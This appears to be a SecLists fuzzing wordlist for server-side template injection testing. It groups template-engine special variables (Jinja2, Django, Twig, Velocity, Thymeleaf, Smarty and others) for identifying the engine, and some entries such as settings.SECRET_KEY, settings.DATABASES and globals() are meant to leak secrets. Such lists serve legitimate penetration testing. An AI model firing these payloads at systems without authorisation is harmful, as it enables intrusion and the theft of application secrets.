79 lines
2.9 KiB
Plaintext
79 lines
2.9 KiB
Plaintext
# The objective of this dictionary is to help to discover the template engine used
|
|
# once a evaluation of a template expression was detected via the following dictionary:
|
|
# https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-expression.txt
|
|
# Special variables are grouped by template engine in order to facilitate the identification.
|
|
# Use the term between the expression syntax identified as evaluated like "{{ xxx }}" for example.
|
|
#
|
|
# Indicate to your fuzzer to ignore a line starting with: "# " (space is important)
|
|
# You can also filter the dictionary before to use it via the command: grep -v "# " > dict.txt
|
|
#
|
|
# Sources:
|
|
# https://portswigger.net/research/server-side-template-injection
|
|
# https://github.com/epinna/tplmap
|
|
# Custom personal labs
|
|
#
|
|
# GENERIC: To cause an error and perhaps get technical information
|
|
1/0
|
|
# FREEMARKER (JAVA)
|
|
# https://freemarker.apache.org/docs/ref_specvar.html
|
|
.version
|
|
.current_template_name
|
|
.locale_object
|
|
# JINJA2 (PYTHON)
|
|
# https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement
|
|
# https://stackoverflow.com/a/40346872/451455
|
|
self._TemplateReference__context
|
|
# DJANGO (PYTHON)
|
|
# https://docs.djangoproject.com/en/3.1/ref/settings/
|
|
settings
|
|
settings.DEBUG
|
|
settings.DATABASES
|
|
settings.SECRET_KEY
|
|
# PUG (NODEJS)
|
|
# https://pugjs.org
|
|
# In case of hit then use "Object.keys(VAR_NAME)" to explore the object properties
|
|
# Self object is available if the "self" options is set to true
|
|
self
|
|
# Payload below are more NodeJS related
|
|
locals
|
|
global
|
|
# ERB (RUBY)
|
|
# https://ruby-doc.org/stdlib-2.7.1/libdoc/erb/rdoc/ERB.html
|
|
ERB.version()
|
|
# TORNADO (PYTHON)
|
|
# https://www.tornadoweb.org/en/stable/template.html
|
|
# Presence of variables with a name starting with "_tt_" indicate usage of Tornado
|
|
locals()
|
|
globals()
|
|
# TWIG (PHP)
|
|
# https://twig.symfony.com/doc/3.x/
|
|
_self
|
|
_self.getTemplateName().__toString
|
|
_context
|
|
_context|length
|
|
_context|keys|first
|
|
constant('Twig_Environment::VERSION')
|
|
constant('Twig_Environment::VERSION_ID')
|
|
constant('Twig_Environment::EXTRA_VERSION')
|
|
# VELOCITY (JAVA)
|
|
# http://velocity.apache.org/tools/devel/generic.html
|
|
$context.keys
|
|
$context.TOOLS_VERSION
|
|
$field.in("org.apache.velocity.runtime.VelocityEngineVersion")
|
|
$field.in("org.apache.velocity.runtime.RuntimeConstants")
|
|
# THYMELEAF (JAVA)
|
|
# https://www.thymeleaf.org/doc/tutorials/3.0/usingthymeleaf.html#variables
|
|
# https://www.thymeleaf.org/doc/tutorials/3.0/usingthymeleaf.html#execution-info
|
|
#execInfo
|
|
#execInfo.templateStack
|
|
#execInfo.templateStack[0].getClass.forName("org.thymeleaf.Thymeleaf").getField("VERSION").get(null)
|
|
execInfo
|
|
execInfo.templateStack
|
|
execInfo.templateStack[0].getClass.forName("org.thymeleaf.Thymeleaf").getField("VERSION").get(null)
|
|
# SMARTY (PHP)
|
|
# https://www.smarty.net/docs/en/language.syntax.variables.tpl
|
|
# https://www.smarty.net/docs/en/language.variables.smarty.tpl#language.variables.smarty.config
|
|
$smarty.version
|
|
$smarty.config
|
|
$smarty.template
|